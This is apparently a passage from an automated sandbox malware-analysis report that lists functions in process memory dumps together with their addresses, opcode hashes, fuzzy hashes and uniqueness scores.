              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5b31b6c35054b3ccff60e3577f5a4d8f3071d6602819861287f8867472eec798
              • Instruction ID: d324c87139905fe1f4a2b6d10346db09823f3892472a37ace1c573eb5991db72
              • Opcode Fuzzy Hash: 5b31b6c35054b3ccff60e3577f5a4d8f3071d6602819861287f8867472eec798
              • Instruction Fuzzy Hash: E6F062B095E54E8BDB4DEF34C45D2BA77A0FF19304F10047ED80EC6192DE36A555C640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF77162 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0f1e13797082697c101b840c30748074e94addb9dc570e673bde94d1a128a1e3
              • Instruction ID: 95ef6cf6f6dc501426efcb3aac83aadf493ae70afb7d4a3cc40107889a5256eb
              • Opcode Fuzzy Hash: 0f1e13797082697c101b840c30748074e94addb9dc570e673bde94d1a128a1e3
              • Instruction Fuzzy Hash: 6A01C4B0D1861DCFDF55EBA8C489AEDB7F1FB58310F20412AD809E3291CB78A584CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF66C68 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 41c4427a73fba52909f0c1586ae93e0ecf7ef10ea6fbd71797436e793d4a8ed1
              • Instruction ID: 3259bf208291b3d23e5ad4a8d491c415d89244c9a2866cc170d4db5a513893c0
              • Opcode Fuzzy Hash: 41c4427a73fba52909f0c1586ae93e0ecf7ef10ea6fbd71797436e793d4a8ed1
              • Instruction Fuzzy Hash: 42F0C8B491D98E9EE752FB38C84D1B97BD0EF49305F000875D80DC2052EE35E144C650
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF52659 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0060f18194bb97d2ab3c6c41876e0a51c7fd10ffb5151f3cdb689c193f438106
              • Instruction ID: c865cdf8e3b89b330148d8ff50cbde1b182c2caee6fa49871b8c452d5cdbbe48
              • Opcode Fuzzy Hash: 0060f18194bb97d2ab3c6c41876e0a51c7fd10ffb5151f3cdb689c193f438106
              • Instruction Fuzzy Hash: 5DF062B180E78E8FE75A9B3488292AD3FB0BF16201F4505BEE909C61D3DB699958C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6DFA0 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2386cf02cef11a7ddd78b77b6a3030d1468b17786dd1867b9e03339cc882818c
              • Instruction ID: 737d8c91ab6f710de8ca654a7584395a78277c1872e6ecdaef43103e13ebe553
              • Opcode Fuzzy Hash: 2386cf02cef11a7ddd78b77b6a3030d1468b17786dd1867b9e03339cc882818c
              • Instruction Fuzzy Hash: B9F04FB1D0A5899ADB16DBB8E4495EDBB70EF05310F4000B9E04EDB192CA355A41CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF62F18 Relevance: .0, Instructions: 36COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9da1069f8c82bd0c3f28deda30cc291ad40324440e0ed31b42cc6d033625d5cb
              • Instruction ID: 2438a720188966f38d273134d438eec47c9898b715096ea5f85da0eaed7ec31f
              • Opcode Fuzzy Hash: 9da1069f8c82bd0c3f28deda30cc291ad40324440e0ed31b42cc6d033625d5cb
              • Instruction Fuzzy Hash: A7F0C2F5E1D68F8AFB92AB78881D2B9BAE0FF14310F000976EC5CC1082DE34D1488781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF66D93 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction ID: 0bb77e6e6133bc37ba2ecc5897c147c815bbe390b09667fc7f09520b70f84cb4
              • Opcode Fuzzy Hash: f04e9c30c860dd751830a5a4a01a0ed7674df398e41215c312ee2f75ede2c065
              • Instruction Fuzzy Hash: 80014FB5C0921ACFDF15CEA0D8456FC77B0AF19321F14023ED406B22C0CB396548DB54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF526CD Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ad6a4eb18d0b8a8a3585a41a8ae5eeeca0c27bfa353872d860b728c424ea1a5d
              • Instruction ID: 779e3264de27d98a0ac1d393c567c52b482d485ecd9c49a2d46080b62a985bf7
              • Opcode Fuzzy Hash: ad6a4eb18d0b8a8a3585a41a8ae5eeeca0c27bfa353872d860b728c424ea1a5d
              • Instruction Fuzzy Hash: 19F0C2B080A28E8FE76A9B3488192B93EA0FF05200F4005BAE909C50D2EB299858C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5AD58 Relevance: .0, Instructions: 34COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e6b8b8707175d8d17d5c9062a0ce02cc79d20c0070aa8586445e2029d5a8959
              • Instruction ID: ae95a9ecedbe4b19f8af5d2a133cd422ec60b5f4c953f6009a3aff9fb5a04c3a
              • Opcode Fuzzy Hash: 5e6b8b8707175d8d17d5c9062a0ce02cc79d20c0070aa8586445e2029d5a8959
              • Instruction Fuzzy Hash: 3FF0E1B0D4A51D8FEB96EB28C48ABF9B7B1FF59300F5042A9C50DD3151CA359D859F80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C468 Relevance: .0, Instructions: 33COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0901801313a527558feabf355a72fe351d1486e17f29aa373b721b3611d93e26
              • Instruction ID: f01b86fee43fdac6085f63d397353d568521c0c19995c3c98e8a07a7daf36cd5
              • Opcode Fuzzy Hash: 0901801313a527558feabf355a72fe351d1486e17f29aa373b721b3611d93e26
              • Instruction Fuzzy Hash: 5201E8B0E1A65A8ADB2DCF78C4545BCB7B0FF44701F50017ED84AA7382DA396504DF04
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF60580 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5c06cb91f744b5d4abb8504dcce596ac2c7c192ea43a9f3baec64a589b74a4cc
              • Instruction ID: 86b10e211456ae8a9e6ece17fbbd76cab5f948a161785b28b71d7198696ac8f5
              • Opcode Fuzzy Hash: 5c06cb91f744b5d4abb8504dcce596ac2c7c192ea43a9f3baec64a589b74a4cc
              • Instruction Fuzzy Hash: D8F03AB0815A5E9EEB95EF78D8096BA76E0FF18300F50093AE819C2190DB7199548B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF67783 Relevance: .0, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff6a7824adf1f7e6e50938235c0288151e810fead7113c8bcdd219531b95e2cc
              • Instruction ID: 7e89e48aea263b721164f5dbc47be19c3e775de6de9722f26bba1afa78c84c56
              • Opcode Fuzzy Hash: ff6a7824adf1f7e6e50938235c0288151e810fead7113c8bcdd219531b95e2cc
              • Instruction Fuzzy Hash: D8F090B1A0850A8BE714EE64C8545FD77A2EB50311F10023BC406D72A2CE355946CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF670A4 Relevance: .0, Instructions: 31COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a293c3c3b9b601be035ba913e2ffbab443e8e6a27d444c3f82956518d4513aab
              • Instruction ID: b955cfe3c2cb4fa582e87deb317325963ed7a2cb22410a0bb8317a2dadbcd790
              • Opcode Fuzzy Hash: a293c3c3b9b601be035ba913e2ffbab443e8e6a27d444c3f82956518d4513aab
              • Instruction Fuzzy Hash: 2AF0FEB6E0855D8BEF14EBA8D4414FDB7F2EF98350F50103AD509E7256DA38A905CB50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF581D5 Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548859871.00007FFBACF55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF55000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf55000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c97c4c801da2ffc0f5fbc91cc71c28fca9bd8331cc71a8bfd72deb8a0a2cc85
              • Instruction ID: 52126c119a77157b32ad4297d9da3d7aaabd1d9b696b4bacb71bc3a90dbe4cbf
              • Opcode Fuzzy Hash: 3c97c4c801da2ffc0f5fbc91cc71c28fca9bd8331cc71a8bfd72deb8a0a2cc85
              • Instruction Fuzzy Hash: 6DF0AFF4D0A61E8FDBA6DA28C8447F977F4AB18301F1001E5950D92241CA399FC99F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6210B Relevance: .0, Instructions: 30COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dc1b8a00df3bd6cacc436b574760f6e9231a8363f0a4f162675c240ab77c9669
              • Instruction ID: ce50e0d9dd5cb446163d20e5880e13da65bab215dced8d79c5fc17883fb92c39
              • Opcode Fuzzy Hash: dc1b8a00df3bd6cacc436b574760f6e9231a8363f0a4f162675c240ab77c9669
              • Instruction Fuzzy Hash: 24F082F0C1D58E8AEB91AB78C84D1B9BAE4FF18300F000975D91CC1081EF75D1588640
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF70190 Relevance: .0, Instructions: 28COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3031fedb3ee489e22dc7e030b9259525ada2776458b8cece254eb05ffe14f9bf
              • Instruction ID: b3f025d789e56697ac0a0818abc44851ef892f109eee97d82c52f6d4906e5f88
              • Opcode Fuzzy Hash: 3031fedb3ee489e22dc7e030b9259525ada2776458b8cece254eb05ffe14f9bf
              • Instruction Fuzzy Hash: F6E06DB4C2965E9AEB92EB78C84C2FE76E8FF18305F000876D81DD2081EB74E1588740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF56E0B Relevance: .0, Instructions: 26COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548859871.00007FFBACF55000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF55000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf55000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df080aa10bf4d25140ba7e49b99ff1651ffed3b82103a65e7cc5337189a4b961
              • Instruction ID: d8ef8d843ae7cc1f4721f98f347a486a8d85b7a2dc5f1c25452fa44e201e3565
              • Opcode Fuzzy Hash: df080aa10bf4d25140ba7e49b99ff1651ffed3b82103a65e7cc5337189a4b961
              • Instruction Fuzzy Hash: 2EF0FEF4E0961E8FDBA5DB28C8447A9B7F4AB18301F1001E5950DD3341CA349FC58F44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6B1FB Relevance: .0, Instructions: 25COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba2a7678f2cde6e9426faf248bf14fb2d8555dd938a2e3ad8472a539937691fc
              • Instruction ID: 893ec10311984826b022ff8a681d1a2cf77ba631b58f2411fbd174082ba1211a
              • Opcode Fuzzy Hash: ba2a7678f2cde6e9426faf248bf14fb2d8555dd938a2e3ad8472a539937691fc
              • Instruction Fuzzy Hash: 2BF0A7B064E7C98BE76B8F31C46427937D19F41301F1005BFCD4AC69C1CA3AE549E601
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF773FC Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bbfa8c9efa05b259dd8937886732befebd4f20020c6ed7ed866b28f1024efc2
              • Instruction ID: 3b0ad670ebf96d2534a5a2d8deb572b94b20cc20b2743d327f0e4b6c06492348
              • Opcode Fuzzy Hash: 6bbfa8c9efa05b259dd8937886732befebd4f20020c6ed7ed866b28f1024efc2
              • Instruction Fuzzy Hash: 57E08CE1D6E84DCBDA43DFB4D0051FC7A68AF4A300FE02036C90EE208ACD2AA4295241
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6C4C0 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 497ad4bd39cc8802ba2bfd8f3bfcc28beea1ca1bed9a7e690cf9d24b773c6373
              • Instruction ID: 25b1e0db69cc521b7d63390261fc60aece669dbd99de39b9b2c222fc8c101364
              • Opcode Fuzzy Hash: 497ad4bd39cc8802ba2bfd8f3bfcc28beea1ca1bed9a7e690cf9d24b773c6373
              • Instruction Fuzzy Hash: F2F05FB0D1965D8FDB6DCF68C8946ECB7B1BB48300F20016D945EA7341CA346A44CF44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF63401 Relevance: .0, Instructions: 23COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction ID: cb4819763a4638522a51f5497dcf64325c078f8806d43a93d6e8ea5d1405e9d5
              • Opcode Fuzzy Hash: aa42e9b19796a7e08efdeeb0a433f3b55ff914da6d000e83b800b2528b8fe5b4
              • Instruction Fuzzy Hash: 22E0C270849A4C6BCB11AF79E808298B3B5FB49304F000639D80CD7041D7369998C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5230D Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548816534.00007FFBACF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF50000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf50000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aabeec1840e349a90428b25f9961007d37d848b264a8fef510d97364c89358d1
              • Instruction ID: 4a8fc750c309a1234bbbd3c95bf5eefc090cd092e7a1321e4084a97111c8001b
              • Opcode Fuzzy Hash: aabeec1840e349a90428b25f9961007d37d848b264a8fef510d97364c89358d1
              • Instruction Fuzzy Hash: 81E0CDF1D4A11D89DB1A9B70E0082FCB274DF41300F501135D61D520C1CE2A5C1C8B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF77458 Relevance: .0, Instructions: 22COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82437e6c3cfdf03733a617ff61452cd04783d5e254df9c0450abc988a22e8d4b
              • Instruction ID: 6bfecfa313a35cf8ec0fad805ad2d7665677641f2ff1c7c447ab1432a4f73120
              • Opcode Fuzzy Hash: 82437e6c3cfdf03733a617ff61452cd04783d5e254df9c0450abc988a22e8d4b
              • Instruction Fuzzy Hash: 69E0C2B084994C8BC752AF69D8043AD7BA4FB49208F40132AD84CC2081D7365AAAC380
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6D471 Relevance: .0, Instructions: 20COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 40907db0c39543558777866691a3c3f00d4120dadef605f5966a5e777d6069ef
              • Instruction ID: a69ff01ba7fa25098c585a9ab4c8e0165942bb887c793788359bffa82eafa994
              • Opcode Fuzzy Hash: 40907db0c39543558777866691a3c3f00d4120dadef605f5966a5e777d6069ef
              • Instruction Fuzzy Hash: 58E0B6C1A1F0C38AF62A9576D91903D06810B44285E600539D90F8E1C6EC2FFC482292
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF5BA62 Relevance: .0, Instructions: 19COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548906970.00007FFBACF5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF5A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf5a000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction ID: fd7ba598e8527cf75cf50352af850d4b33fbaf7fe54cb666c47eda9ac7652e93
              • Opcode Fuzzy Hash: ef33fd9f7a74b930893de0ab397cf34e537c179a896505af53d0efecad86fc2a
              • Instruction Fuzzy Hash: B3D0E2B9A0882DCF8F40EFA8D8041ECB7B0FB58301B000032E90DE3140CB20A8248B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF72D0C Relevance: .0, Instructions: 17COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8f939b286b03adf057aac8c980c5f480e42634f8bc09c802d7132f8575d0d5f5
              • Instruction ID: 8703fefec4ea49e8434d7b1112012d53beff5dadcd914c6acc891f7a7999132c
              • Opcode Fuzzy Hash: 8f939b286b03adf057aac8c980c5f480e42634f8bc09c802d7132f8575d0d5f5
              • Instruction Fuzzy Hash: 2BE0BF7091975D8FCF65EA14C849B99B3B4FF54310F1001A9944D93250DF31AA848F81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF763B8 Relevance: .0, Instructions: 10COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e2f841b14f9191e254a63b4bf52e8030d1889ef2dd1b9d5f80124609a4fe7e85
              • Instruction ID: 196644786ef0d3e0cf0d59aec15f17ef0a7ee7725b0f365d1440cdedba64d5bf
              • Opcode Fuzzy Hash: e2f841b14f9191e254a63b4bf52e8030d1889ef2dd1b9d5f80124609a4fe7e85
              • Instruction Fuzzy Hash: BEB09273A5552D858B02A6A5F8014EEB360FF85221B400133EA1AA24519E222A288681
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6D441 Relevance: .0, Instructions: 9COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b422de280f73644746414c1924fe7a455dfe2180ecce04297a11ac1f7775f22
              • Instruction ID: 01cf84bd5e8ee18e005cd9e9f2c1a9cdbabac7e9faf776841c4e4a8651deabc0
              • Opcode Fuzzy Hash: 8b422de280f73644746414c1924fe7a455dfe2180ecce04297a11ac1f7775f22
              • Instruction Fuzzy Hash: 2AC048D0C0F08381E4273271998A0B81440AFC9310EA001B2CC0E4A08EEC7FBADC2393
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6A731 Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15e8eda7cab3112e763f503f43486552b82a51842f249abba0030f95f6167538
              • Instruction ID: a18289dc85523bf483d2c16c06be8bd313f2e51a895bb0abc4e5744b6291b328
              • Opcode Fuzzy Hash: 15e8eda7cab3112e763f503f43486552b82a51842f249abba0030f95f6167538
              • Instruction Fuzzy Hash: 14B012C0F0E3C343B12200B4848C03C00614B14200A600532DD4B561C3DD7FBC093290
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6B42B Relevance: .0, Instructions: 6COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62647b693ff75986a30649d595148d6309b46fb79eaf71610bda3f56191bcb90
              • Instruction ID: 707afd77b2a0f4ccf1c7f0fca5e84a0631323609d233b506ab9750e4448f24a0
              • Opcode Fuzzy Hash: 62647b693ff75986a30649d595148d6309b46fb79eaf71610bda3f56191bcb90
              • Instruction Fuzzy Hash: 8DC04CB040F3C28ED3136734C5551683BE45F0320471506B5D4548A1D7D93AA459E751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF6AC48 Relevance: .0, Instructions: 5COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f1c0fdc4e1a6ce68306c09ce30ef8af0b0b01c8b8a3d3113246c87e86087d644
              • Instruction ID: 2b3bbfe308db77c4466a4fa194126bcc2ce42c39d80f298663b5df8c48a80bfe
              • Opcode Fuzzy Hash: f1c0fdc4e1a6ce68306c09ce30ef8af0b0b01c8b8a3d3113246c87e86087d644
              • Instruction Fuzzy Hash: DEA02280E0CA3202B83A3030000E03C00A20F00380B02823BEC0FE20C38E0C2EC220EE
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 00007FFBACF607CF Relevance: 5.1, Strings: 4, Instructions: 120COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.548971965.00007FFBACF60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_7ffbacf60000_vLhkFRJoasJvKPEeUEtn.jbxd
              Similarity
              • API ID:
              • String ID: "$+$/$]
              • API String ID: 0-387013541
